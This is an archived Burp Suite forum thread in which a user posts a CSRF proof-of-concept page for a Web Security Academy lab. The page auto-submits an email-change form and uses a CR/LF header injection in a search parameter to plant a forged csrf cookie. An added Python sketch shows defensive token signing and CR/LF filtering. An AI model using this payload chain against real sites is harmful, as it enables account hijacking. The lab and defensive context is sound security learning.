The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Cannot solve lab "CSRF where token is duplicated in cookie"

HieuNgTe | Last updated: Jan 05, 2024 04:50PM UTC

I cannot solve lab "CSRF where token is duplicated in cookie". This is my CSRF POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://0a310063031c4c6282ee29fc0064006f.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="wiener&#64;normal&#45;user&#46;net" />
      <input type="hidden" name="csrf" value="csrftest" />
      <input type="submit" value="Submit request" />
    </form>
    <img src="https://0a310063031c4c6282ee29fc0064006f.web-security-academy.net/?search=test%0d%0aSet-Cookie:csrf=csrftest%3b%20SameSite=None" onerror="document.forms[0].submit();"/>
  </body>
</html>
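The PoC above sends the same chosen value in the csrf cookie and the csrf form field, and uses a CR/LF sequence in the search parameter to set that cookie. As an added example (not part of the original post and not PortSwigger's lab code), the sketch below puts a compare-only double-submit check beside a session-bound, HMAC-signed one and a CR/LF filter for reflected header values. The function names, the `SERVER_KEY` secret and the session ids are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Assumption: a per-deployment secret that is never sent to the client.
SERVER_KEY = secrets.token_bytes(32)


def naive_double_submit(cookie_csrf: str, form_csrf: str) -> bool:
    """Weak check: only tests that cookie and form field carry the same value."""
    return bool(cookie_csrf) and hmac.compare_digest(
        cookie_csrf.encode(), form_csrf.encode()
    )


def _mac(session_id: str, nonce: str) -> str:
    msg = f"{session_id}|{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_token(session_id: str) -> str:
    """Token = nonce.HMAC(key, session|nonce), so it is valid for one session only."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def signed_double_submit(session_id: str, cookie_csrf: str, form_csrf: str) -> bool:
    """Hardened check: values must match AND carry a MAC bound to this session."""
    if not naive_double_submit(cookie_csrf, form_csrf):
        return False
    nonce, sep, mac = form_csrf.partition(".")
    if not sep or not nonce or not mac:
        return False  # a client-chosen value such as "csrftest" has no MAC
    return hmac.compare_digest(mac.encode(), _mac(session_id, nonce).encode())


def safe_header_value(value: str) -> str:
    """Refuse CR/LF before a request value is reflected into a response header."""
    if "\r" in value or "\n" in value:
        raise ValueError("CR/LF not allowed in header value")
    return value


if __name__ == "__main__":
    # Constructed inputs: "csrftest" is the value used in the PoC above.
    print("naive accepts matching pair:", naive_double_submit("csrftest", "csrftest"))
    print("signed accepts matching pair:", signed_double_submit("sess-A", "csrftest", "csrftest"))
    token = issue_token("sess-A")
    print("signed accepts issued token:", signed_double_submit("sess-A", token, token))
```
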

Ben, PortSwigger Agent | Last updated: Jan 08, 2024 11:26AM UTC